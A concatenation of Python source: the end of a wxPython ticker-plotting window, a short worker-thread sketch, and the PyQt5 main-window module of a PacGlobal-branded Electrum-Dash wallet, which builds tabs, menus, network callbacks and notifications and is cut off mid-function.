upper=ymax) # X axis format setting if diff < timedelta(minutes=20): hfmt = dates.DateFormatter('%H:%M') self.axes25.xaxis.set_major_formatter(hfmt) self.axes25.xaxis.set_major_locator(dates.MinuteLocator(byminute=range(60), interval=2)) self.axes25.xaxis.set_minor_locator(dates.MinuteLocator(interval=1)) elif diff < timedelta(hours=1): hfmt = dates.DateFormatter('%H:%M') self.axes25.xaxis.set_major_formatter(hfmt) self.axes25.xaxis.set_major_locator(dates.MinuteLocator(byminute=range(60), interval=5)) self.axes25.xaxis.set_minor_locator(dates.MinuteLocator(interval=2)) elif diff < timedelta(hours=6): hfmt = dates.DateFormatter('%H:%M') self.axes25.xaxis.set_major_formatter(hfmt) self.axes25.xaxis.set_major_locator(dates.MinuteLocator(interval=30)) self.axes25.xaxis.set_minor_locator(dates.MinuteLocator(interval=10)) elif diff < timedelta(days=2): hfmt = dates.DateFormatter('%H:%M') self.axes25.xaxis.set_major_formatter(hfmt) self.axes25.xaxis.set_major_locator(dates.HourLocator(interval=4)) self.axes25.xaxis.set_minor_locator(dates.HourLocator(interval=1)) elif diff < timedelta(days=10): hfmt = dates.DateFormatter('%m/%d') self.axes25.xaxis.set_major_formatter(hfmt) self.axes25.xaxis.set_major_locator(dates.DayLocator(interval=1)) self.axes25.xaxis.set_minor_locator(dates.HourLocator(interval=6)) elif diff < timedelta(days=40): hfmt = dates.DateFormatter('%m/%d') self.axes25.xaxis.set_major_formatter(hfmt) self.axes25.xaxis.set_major_locator(dates.DayLocator(interval=2)) self.plot_data25.set_xdata(fds) 
self.plot_data25.set_ydata(self.tickerData.y25Ticker) self.plot_data10.set_xdata(fds) self.plot_data10.set_ydata(self.tickerData.y10Ticker) xlabels = self.axes25.get_xticklabels() for xl in xlabels: xl.set_rotation(45) self.__updatePlot() def __updatePlot(self): '''''need to use this function update graphy if any data updated ''' self.FigureCanvas.draw() if __name__ == '__main__': app = wx.App() # wx.InitAllImageHandlers() frame = MainFrame(None) app.SetTopWindow(frame) frame.Show() app.MainLoop()
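# ---------------------------------------------------------------------------
# A minimal, self-contained sketch (not part of the original sources) of the
# worker-thread / wx.PostEvent pattern the MainFrame above relies on: the GUI
# enqueues work, a background thread drains the queue, and results are handed
# back to the GUI thread through a custom event.  The names DataReady and
# WorkerFrame are illustrative assumptions, not identifiers from this project,
# and the sketch targets Python 3 (the file above imports the Python 2 "Queue"
# module).
# ---------------------------------------------------------------------------
import wx
from wx.lib.newevent import NewEvent
from threading import Thread
from queue import Queue, Empty

DataReady, EVT_DATA_READY = NewEvent()

class WorkerFrame(wx.Frame):
    def __init__(self):
        wx.Frame.__init__(self, None, title="worker sketch")
        self.Bind(EVT_DATA_READY, self.on_data_ready)
        self.Bind(wx.EVT_CLOSE, self.on_close)
        self._queue = Queue()
        self._active = True
        self._thread = Thread(target=self._run)
        self._thread.start()
        self._queue.put(42)          # pretend a timer produced a sample

    def _run(self):
        # Runs off the GUI thread: never touch widgets here, only post events.
        while self._active:
            try:
                value = self._queue.get(block=True, timeout=1)
            except Empty:
                continue
            wx.PostEvent(self, DataReady(value=value))

    def on_data_ready(self, event):
        # Delivered on the GUI thread, so widget updates are safe here.
        print("received", event.value)

    def on_close(self, event):
        # Stop the worker before the window is destroyed.
        self._active = False
        self._thread.join()
        event.Skip()

if __name__ == '__main__':
    app = wx.App()
    frame = WorkerFrame()
    frame.Show()
    app.MainLoop()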
main_window.py
#!/usr/bin/env python # # Electrum - lightweight Bitcoin client # Copyright (C) 2012 thomasv@gitorious # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import sys import time import threading import os import traceback import json import shutil import weakref import csv from decimal import Decimal import base64 from functools import partial import queue import asyncio from typing import Optional from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal, pyqtSlot from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget, QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel, QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem, QHBoxLayout, QPushButton, QScrollArea, QTextEdit, QShortcut, QMainWindow, QCompleter, QInputDialog, QWidget, QMenu, QSizePolicy, QStatusBar, QAction) import electrum_dash from electrum_dash import (keystore, simple_config, ecc, constants, util, bitcoin, commands, coinchooser, paymentrequest) from electrum_dash.bitcoin import COIN, is_address, TYPE_ADDRESS from electrum_dash.dash_tx import DashTxError from electrum_dash.plugin import run_hook from electrum_dash.i18n import _ from electrum_dash.util import (format_time, format_satoshis, format_fee_satoshis, format_satoshis_plain, NotEnoughFunds, UserCancelled, NoDynamicFeeEstimates, profiler, export_meta, import_meta, bh2u, bfh, InvalidPassword, base_units, base_units_list, base_unit_name_to_decimal_point, decimal_point_to_base_unit_name, quantize_feerate, UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException, get_new_wallet_name, send_exception_to_crash_reporter, InvalidBitcoinURI) from electrum_dash.transaction import Transaction, TxOutput from electrum_dash.address_synchronizer import AddTransactionException from electrum_dash.wallet import (Multisig_Wallet, Abstract_Wallet, sweep_preparations, InternalAddressCorruption) from electrum_dash.version import ELECTRUM_VERSION from electrum_dash.network import Network, TxBroadcastError, BestEffortRequestFailed from electrum_dash.exchange_rate import FxThread from electrum_dash.simple_config import SimpleConfig from electrum_dash.logging import Logger from electrum_dash.paymentrequest import PR_PAID from electrum_dash.base_crash_reporter import BaseCrashReporter from electrum_dash.masternode_manager import MasternodeManager from .exception_window import Exception_Hook from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit from .qrcodewidget import QRCodeWidget, 
QRDialog from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit from .transaction_dialog import show_transaction from .fee_slider import FeeSlider from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog, WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons, OkButton, InfoButton, WWLabel, TaskThread, CancelButton, CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values, ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui, filename_field, address_field, char_width_in_lineedit, webopen) from .installwizard import WIF_HELP_TEXT from .history_list import HistoryList, HistoryModel from .update_checker import UpdateCheck, UpdateCheckThread from .masternode_dialog import MasternodeDialog from .dash_qt import ExtraPayloadWidget from .protx_qt import create_dip3_tab class StatusBarButton(QPushButton): def __init__(self, icon, tooltip, func): QPushButton.__init__(self, icon, '') self.setToolTip(tooltip) self.setFlat(True) self.setMaximumWidth(31) self.clicked.connect(self.onPress) self.func = func self.setIconSize(QSize(25,25)) self.setCursor(QCursor(Qt.PointingHandCursor)) def onPress(self, checked=False): '''Drops the unwanted PyQt5 "checked" argument''' self.func() def keyPressEvent(self, e): if e.key() == Qt.Key_Return: self.func() class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger): payment_request_ok_signal = pyqtSignal() payment_request_error_signal = pyqtSignal() new_fx_quotes_signal = pyqtSignal() new_fx_history_signal = pyqtSignal() network_signal = pyqtSignal(str, object) alias_received_signal = pyqtSignal() computing_privkeys_signal = pyqtSignal() show_privkeys_signal = pyqtSignal() def __init__(self, gui_object, wallet: Abstract_Wallet): QMainWindow.__init__(self) self.setObjectName("main_window_container") self.masternode_manager = None self.gui_object = gui_object self.config = config = gui_object.config # type: SimpleConfig self.gui_thread = gui_object.gui_thread self._old_excepthook = None self.setup_exception_hook() self.network = gui_object.daemon.network # type: Network assert wallet, "no wallet" self.wallet = wallet self.fx = gui_object.daemon.fx # type: FxThread self.invoices = wallet.invoices self.contacts = wallet.contacts self.tray = gui_object.tray self.app = gui_object.app self.cleaned_up = False self.payment_request = None # type: Optional[paymentrequest.PaymentRequest] self.checking_accounts = False self.qr_window = None self.not_enough_funds = False self.pluginsdialog = None self.require_fee_update = False self.tl_windows = [] self.tx_external_keypairs = {} Logger.__init__(self) self.tx_notification_queue = queue.Queue() self.tx_notification_last_time = 0 self.create_status_bar() self.need_update = threading.Event() self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT) try: decimal_point_to_base_unit_name(self.decimal_point) except UnknownBaseUnit: self.decimal_point = DECIMAL_POINT_DEFAULT self.num_zeros = int(config.get('num_zeros', 8)) self.completions = QStringListModel() self.tabs = tabs = QTabWidget(self) self.send_tab = self.create_send_tab() self.receive_tab = self.create_receive_tab() self.addresses_tab = self.create_addresses_tab() self.utxo_tab = self.create_utxo_tab() self.dip3_tab = create_dip3_tab(self, wallet) self.console_tab = self.create_console_tab() self.contacts_tab = self.create_contacts_tab() # Disabled until API is stable. 
# tabs.addTab(self.create_proposals_tab(), _('Budget Proposals')) tabs.setMinimumSize(1020, 500) tabs.setObjectName("main_window_nav_bar") tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History')) tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send')) tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive')) def add_optional_tab(tabs, tab, icon, description, name): tab.tab_icon = icon tab.tab_description = description tab.tab_pos = len(tabs) tab.tab_name = name if self.config.get('show_{}_tab'.format(name), False): tabs.addTab(tab, icon, description.replace("&", "")) add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses") add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo") add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts") add_optional_tab(tabs, self.dip3_tab, read_QIcon("tab_dip3.png"), _("&DIP3"), "dip3") add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console") tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding) self.setCentralWidget(tabs) if self.config.get("is_maximized"): self.showMaximized() self.setWindowIcon(read_QIcon("electrum-pac.png")) self.init_menubar() wrtabs = weakref.proxy(tabs) QShortcut(QKeySequence("Ctrl+W"), self, self.close) QShortcut(QKeySequence("Ctrl+Q"), self, self.close) QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet) QShortcut(QKeySequence("F5"), self, self.update_wallet) QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+M"), self, self.show_masternode_dialog) for i in range(wrtabs.count()): QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i)) self.payment_request_ok_signal.connect(self.payment_request_ok) self.payment_request_error_signal.connect(self.payment_request_error) # self.connect(self, QtCore.SIGNAL('proposals_changed'), self.proposals_changed) self.history_list.setFocus(True) # network callbacks if self.network: self.network_signal.connect(self.on_network_qt) self.gui_object.dash_net_sobj.main.connect(self.on_dash_net_qt) interests = ['wallet_updated', 'network_updated', 'blockchain_updated', 'new_transaction', 'status', 'banner', 'verified', 'fee', 'fee_histogram'] # 'proposals'] # To avoid leaking references to "self" that prevent the # window from being GC-ed when closed, callbacks should be # methods of this class only, and specifically not be # partials, lambdas or methods of subobjects. Hence... 
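        # on_network() itself runs on the network thread; anything that must touch
        # Qt widgets is forwarded to the GUI thread through self.network_signal and
        # handled in on_network_qt().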
self.network.register_callback(self.on_network, interests) # set initial message self.console.showMessage(self.network.banner) self.network.register_callback(self.on_quotes, ['on_quotes']) self.network.register_callback(self.on_history, ['on_history']) self.new_fx_quotes_signal.connect(self.on_fx_quotes) self.new_fx_history_signal.connect(self.on_fx_history) # dash net callbacks self.network.dash_net.register_callback(self.on_dash_net, ['dash-net-updated', 'dash-peers-updated']) self.update_dash_net_status_btn() # update fee slider in case we missed the callback self.fee_slider.update() self.load_wallet(wallet) gui_object.timer.timeout.connect(self.timer_actions) self.fetch_alias() if getattr(self.wallet.storage, 'backup_message', None): self.show_warning(self.wallet.storage.backup_message, title=_('Information')) #if (self.network # and self.network.tor_auto_on and not self.network.tor_on): # self.show_warning(self.network.tor_warn_msg + # self.network.tor_docs_uri_qt, rich_text=True) # If the option hasn't been set yet if config.get('check_updates') is None: choice = self.question(title="PacGlobal Electrum - " + _("Enable update check"), msg=_("For security reasons we advise that you always use the latest version of PacGlobal Electrum.") + " " + _("Would you like to be notified when there is a newer version of PacGlobal Electrum available?")) config.set_key('check_updates', bool(choice), save=True) if config.get('check_updates', False): # The references to both the thread and the window need to be stored somewhere # to prevent GC from getting in our way. def on_version_received(v): if UpdateCheck.is_newer(v): self.update_check_button.setText(_("Update to PacGlobal Electrum {} is available").format(v)) self.update_check_button.clicked.connect(lambda: self.show_update_check(v)) self.update_check_button.show() self._update_check_thread = UpdateCheckThread(self) self._update_check_thread.checked.connect(on_version_received) self._update_check_thread.start() def on_history(self, b): self.wallet.clear_coin_price_cache() self.new_fx_history_signal.emit() def setup_exception_hook(self): Exception_Hook(self) def on_fx_history(self): self.history_model.refresh('fx_history') self.address_list.update() def on_quotes(self, b): self.new_fx_quotes_signal.emit() def on_fx_quotes(self): self.update_status() # Refresh edits with the new rate edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e edit.textEdited.emit(edit.text()) edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e edit.textEdited.emit(edit.text()) # History tab needs updating if it used spot if self.fx.history_used_spot: self.history_model.refresh('fx_quotes') self.address_list.update() def toggle_tab(self, tab): show = not self.config.get('show_{}_tab'.format(tab.tab_name), False) self.config.set_key('show_{}_tab'.format(tab.tab_name), show) item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description) tab.menu_action.setText(item_text) if show: # Find out where to place the tab index = len(self.tabs) for i in range(len(self.tabs)): try: if tab.tab_pos < self.tabs.widget(i).tab_pos: index = i break except AttributeError: pass self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", "")) else: i = self.tabs.indexOf(tab) self.tabs.removeTab(i) def push_top_level_window(self, window): '''Used for e.g. tx dialog box to ensure new dialogs are appropriately parented. 
This used to be done by explicitly providing the parent window, but that isn't something hardware wallet prompts know.''' self.tl_windows.append(window) def pop_top_level_window(self, window): self.tl_windows.remove(window) def top_level_window(self, test_func=None): '''Do the right thing in the presence of tx dialog windows''' override = self.tl_windows[-1] if self.tl_windows else None if override and test_func and not test_func(override): override = None # only override if ok for test_func return self.top_level_window_recurse(override, test_func) def diagnostic_name(self): #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name()) return self.wallet.diagnostic_name() def is_hidden(self): return self.isMinimized() or self.isHidden() def show_or_hide(self): if self.is_hidden(): self.bring_to_top() else: self.hide() def bring_to_top(self): self.show() self.raise_() def on_error(self, exc_info): e = exc_info[1] if isinstance(e, UserCancelled): pass elif isinstance(e, UserFacingException): self.show_error(str(e)) else: try: self.logger.error("on_error", exc_info=exc_info) except OSError: pass # see #4418 self.show_error(str(e)) def on_network(self, event, *args): if event == 'wallet_updated': wallet = args[0] if wallet == self.wallet: self.need_update.set() elif event == 'network_updated': self.gui_object.network_updated_signal_obj.network_updated_signal \ .emit(event, args) self.network_signal.emit('status', None) elif event == 'blockchain_updated': # to update number of confirmations in history self.need_update.set() elif event == 'new_transaction': wallet, tx = args if wallet == self.wallet: self.tx_notification_queue.put(tx) elif event in ['status', 'banner', 'verified', 'fee', 'proposals', 'fee_histogram']: # Handle in GUI thread self.network_signal.emit(event, args) else: self.logger.info(f"unexpected network message: {event} {args}") def on_dash_net(self, event, *args): self.gui_object.dash_net_sobj.main.emit(event, args) def on_dash_net_qt(self, event, args=None): self.update_dash_net_status_btn() def update_dash_net_status_btn(self): net = self.network icon = (net.dash_net.status_icon() if net else 'dash_net_off.png') self.dash_net_button.setIcon(read_QIcon(icon)) def on_network_qt(self, event, args=None): # Handle a network message in the GUI thread if event == 'status': self.update_status() elif event == 'banner': self.console.showMessage(args[0]) elif event == 'verified': wallet, tx_hash, tx_mined_status = args if wallet == self.wallet: self.history_model.update_tx_mined_status(tx_hash, tx_mined_status) elif event == 'fee': if self.config.is_dynfee(): self.fee_slider.update() self.require_fee_update = True elif event == 'fee_histogram': if self.config.is_dynfee(): self.fee_slider.update() self.require_fee_update = True self.history_model.on_fee_histogram() elif event == 'proposals': self.proposals_changed() else: self.logger.info(f"unexpected network_qt signal: {event} {args}") def fetch_alias(self): self.alias_info = None alias = self.config.get('alias') if alias: alias = str(alias) def f(): self.alias_info = self.contacts.resolve_openalias(alias) self.alias_received_signal.emit() t = threading.Thread(target=f) t.setDaemon(True) t.start() def close_wallet(self): if self.wallet: self.logger.info(f'close_wallet {self.wallet.storage.path}') run_hook('close_wallet', self.wallet) @profiler def load_wallet(self, wallet): wallet.thread = TaskThread(self, self.on_error) self.masternode_manager = MasternodeManager(self.wallet, self.config) 
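        # The rest of load_wallet() refreshes GUI state for the newly opened wallet:
        # DIP3 model, menus, lock icon, console, receive tab and window geometry.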
self.dip3_tab.w_model.reload_data() self.dip3_tab.update_wallet_label() self.update_recently_visited(wallet.storage.path) self.need_update.set() # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized # update menus self.seed_menu.setEnabled(self.wallet.has_seed()) self.update_lock_icon() self.update_buttons_on_seed() self.update_console() self.clear_receive_tab() self.request_list.update() self.tabs.show() self.init_geometry() if self.config.get('hide_gui') and self.gui_object.tray.isVisible(): self.hide() else: self.show() self.watching_only_changed() run_hook('load_wallet', wallet, self) try: wallet.try_detecting_internal_addresses_corruption() except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) def init_geometry(self): winpos = self.wallet.storage.get("winpos-qt") try: screen = self.app.desktop().screenGeometry() assert screen.contains(QRect(*winpos)) self.setGeometry(*winpos) except: self.logger.info("using default geometry") self.setGeometry(100, 100, 840, 400) def watching_only_changed(self): name = "PacGlobal Electrum Testnet" if constants.net.TESTNET else "PacGlobal Electrum" title = '%s %s - %s' % (name, ELECTRUM_VERSION, self.wallet.basename()) extra = [self.wallet.storage.get('wallet_type', '?')] if self.wallet.is_watching_only(): extra.append(_('watching only')) title += ' [%s]'% ', '.join(extra) self.setWindowTitle(title) self.password_menu.setEnabled(self.wallet.may_have_password()) self.import_privkey_menu.setVisible(self.wallet.can_import_privkey()) self.import_address_menu.setVisible(self.wallet.can_import_address()) self.export_menu.setEnabled(self.wallet.can_export()) def warn_if_watching_only(self): if self.wallet.is_watching_only(): msg = ' '.join([ _("This wallet is watching-only."), _("This means you will not be able to spend PACGlobal coins with it."), _("Make sure you own the seed phrase or the private keys, before you request PACGlobal coins to be sent to this wallet.") ]) self.show_warning(msg, title=_('Watch-only wallet')) def warn_if_testnet(self): if not constants.net.TESTNET: return # user might have opted out already if self.config.get('dont_show_testnet_warning', False): return # only show once per process lifecycle if getattr(self.gui_object, '_warned_testnet', False): return self.gui_object._warned_testnet = True msg = ''.join([ _("You are in testnet mode."), ' ', _("Testnet coins are worthless."), '\n', _("Testnet is separate from the main PACGlobal network. 
It is used for testing.") ]) cb = QCheckBox(_("Don't show this again.")) cb_checked = False def on_cb(x): nonlocal cb_checked cb_checked = x == Qt.Checked cb.stateChanged.connect(on_cb) self.show_warning(msg, title=_('Testnet'), checkbox=cb) if cb_checked: self.config.set_key('dont_show_testnet_warning', True) def open_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if not filename: return self.gui_object.new_window(filename) def backup_wallet(self): path = self.wallet.storage.path wallet_folder = os.path.dirname(path) filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) if not filename: return new_path = os.path.join(wallet_folder, filename) if new_path != path: try: shutil.copy2(path, new_path) self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created")) except BaseException as reason: self.show_critical(_("PacGlobal Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup")) def update_recently_visited(self, filename): recent = self.config.get('recently_open', []) try: sorted(recent) except: recent = [] if filename in recent: recent.remove(filename) recent.insert(0, filename) recent = [path for path in recent if os.path.exists(path)] recent = recent[:5] self.config.set_key('recently_open', recent) self.recently_visited_menu.clear() for i, k in enumerate(sorted(recent)): b = os.path.basename(k) def loader(k): return lambda: self.gui_object.new_window(k) self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1))) self.recently_visited_menu.setEnabled(len(recent)) def get_wallet_folder(self): return os.path.dirname(os.path.abspath(self.config.get_wallet_path())) def new_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename = get_new_wallet_name(wallet_folder) full_path = os.path.join(wallet_folder, filename) self.gui_object.start_new_window(full_path, None) def init_menubar(self): menubar = QMenuBar() file_menu = menubar.addMenu(_("&File")) self.recently_visited_menu = file_menu.addMenu(_("&Recently open")) file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open) file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New) file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs) file_menu.addAction(_("Delete"), self.remove_wallet) file_menu.addSeparator() file_menu.addAction(_("&Quit"), self.close) wallet_menu = menubar.addMenu(_("&Wallet")) wallet_menu.addAction(_("&Information"), self.show_master_public_keys) wallet_menu.addSeparator() self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog) self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog) self.private_keys_menu = wallet_menu.addMenu(_("&Private keys")) self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog) self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey) self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog) self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses) wallet_menu.addSeparator() 
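        # Sub-menus for addresses, labels, history, contacts and invoices follow,
        # then the View, Tools and Help menus are built further down.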
addresses_menu = wallet_menu.addMenu(_("&Addresses")) addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config)) labels_menu = wallet_menu.addMenu(_("&Labels")) labels_menu.addAction(_("&Import"), self.do_import_labels) labels_menu.addAction(_("&Export"), self.do_export_labels) history_menu = wallet_menu.addMenu(_("&History")) history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config)) history_menu.addAction(_("&Summary"), self.history_list.show_summary) history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog) history_menu.addAction(_("&Export"), self.history_list.export_history_dialog) contacts_menu = wallet_menu.addMenu(_("Contacts")) contacts_menu.addAction(_("&New"), self.new_contact_dialog) contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts()) contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts()) invoices_menu = wallet_menu.addMenu(_("Invoices")) invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices()) invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices()) wallet_menu.addSeparator() wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F")) def add_toggle_action(view_menu, tab): is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False) item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab)) view_menu = menubar.addMenu(_("&View")) add_toggle_action(view_menu, self.addresses_tab) add_toggle_action(view_menu, self.utxo_tab) add_toggle_action(view_menu, self.contacts_tab) add_toggle_action(view_menu, self.dip3_tab) add_toggle_action(view_menu, self.console_tab) wallet_menu.addSeparator() wallet_menu.addAction(_("Masternodes"), self.show_masternode_dialog) tools_menu = menubar.addMenu(_("&Tools")) # Settings / Preferences are all reserved keywords in macOS using this as work around tools_menu.addAction(_("PacGlobal Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog) tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self)) tools_menu.addAction(_("&Plugins"), self.plugins_dialog) tools_menu.addSeparator() tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message) tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message) tools_menu.addSeparator() paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany) raw_transaction_menu = tools_menu.addMenu(_("&Load transaction")) raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file) raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text) raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid) raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode) self.raw_transaction_menu = raw_transaction_menu run_hook('init_menubar_tools', self, tools_menu) help_menu = menubar.addMenu(_("&Help")) help_menu.addAction(_("&About"), self.show_about) help_menu.addAction(_("&Check for updates"), self.show_update_check) help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.dash.org")) help_menu.addSeparator() help_menu.addAction(_("&Documentation"), lambda: webopen("https://docs.dash.org/en/stable/wallets/index.html#dash-electrum-wallet")).setShortcut(QKeySequence.HelpContents) self._auto_crash_reports = 
QAction(_("&Automated Crash Reports"), self, checkable=True) self._auto_crash_reports.setChecked(self.config.get(BaseCrashReporter.config_key, default=False)) self._auto_crash_reports.triggered.connect(self.auto_crash_reports) help_menu.addAction(self._auto_crash_reports) help_menu.addAction(_("&Report Bug"), self.show_report_bug) help_menu.addSeparator() help_menu.addAction(_("&Donate to server"), self.donate_to_server) self.setMenuBar(menubar) def auto_crash_reports(self, state): self.config.set_key(BaseCrashReporter.config_key, state) self.setup_exception_hook() def donate_to_server(self): d = self.network.get_donation_address() if d: host = self.network.get_parameters().host self.pay_to_URI('dash:%s?message=donation for %s'%(d, host)) else: self.show_error(_('No donation address for this server')) def show_about(self): QMessageBox.about(self, "PacGlobal Electrum", (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" + _("Electrum's focus is speed, with low resource usage and simplifying PACGlobal.") + " " + _("You do not need to perform regular backups, because your wallet can be " "recovered from a secret phrase that you can memorize or write on paper.") + " " + _("Startup times are instant because it operates in conjunction with high-performance " "servers that handle the most complicated parts of the PACGlobal system.") + "\n\n" + _("Uses icons from the Icons8 icon pack (icons8.com)."))) def show_update_check(self, version=None): self.gui_object._update_check = UpdateCheck(self, version) def show_report_bug(self): msg = ' '.join([ _("Please report any bugs as issues on github:<br/>"), f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''', _("Before reporting a bug, upgrade to the most recent version of PacGlobal Electrum (latest release or git HEAD), and include the version number in your report."), _("Try to explain not only what the bug is, but how it occurs.") ]) self.show_message(msg, title="PacGlobal Electrum - " + _("Reporting Bugs"), rich_text=True) def notify_transactions(self): if self.tx_notification_queue.qsize() == 0: return if not self.wallet.up_to_date: return # no notifications while syncing now = time.time() rate_limit = 20 # seconds if self.tx_notification_last_time + rate_limit > now: return self.tx_notification_last_time = now self.logger.info("Notifying GUI about new transactions") txns = [] while True: try: txns.append(self.tx_notification_queue.get_nowait()) except queue.Empty: break # Combine the transactions if there are at least three if len(txns) >= 3: total_amount = 0 for tx in txns: is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if not is_relevant: continue total_amount += v self.notify(_("{} new transactions: Total amount received in the new transactions {}") .format(len(txns), self.format_amount_and_units(total_amount))) else: for tx in txns: is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if not is_relevant: continue self.notify(_("New transaction: {}").format(self.format_amount_and_units(v))) def notify(self, message): if self.tray: try: # this requires Qt 5.9 self.tray.showMessage("PacGlobal Electrum", message, read_QIcon("electrum_dark_icon"), 20000) except TypeError: self.tray.showMessage("PacGlobal Electrum", message, QSystemTrayIcon.Information, 20000) # custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user def getOpenFileName(self, title, filter = ""): directory = self.config.get('io_dir', os.path.expanduser('~')) fileName, __ = 
